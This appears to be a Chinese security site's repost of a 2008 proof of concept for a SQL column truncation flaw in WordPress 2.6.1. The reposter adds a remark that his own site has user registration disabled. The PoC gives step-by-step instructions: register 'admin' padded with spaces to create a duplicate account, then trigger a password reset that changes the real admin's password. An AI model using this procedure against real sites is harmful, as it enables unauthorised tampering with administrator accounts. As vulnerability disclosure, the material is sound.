首页 网络安全 安全学院 查看内容

WordPress 2.6.1 SQL Column Truncation Vulnerability

2008-9-10 17:52 806 0

摘要: 用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability...
关键词: nbsp admin wordpress email password login Truncation com register your

用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)## found by irk4z[at]yahoo.pl# homepage: http://irk4z.wordpress.com/## this is not critical vuln [;## first, read this discovery:# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/## in this hack we can remote change admin password, if registration enabled## greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin                                                       xemail: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部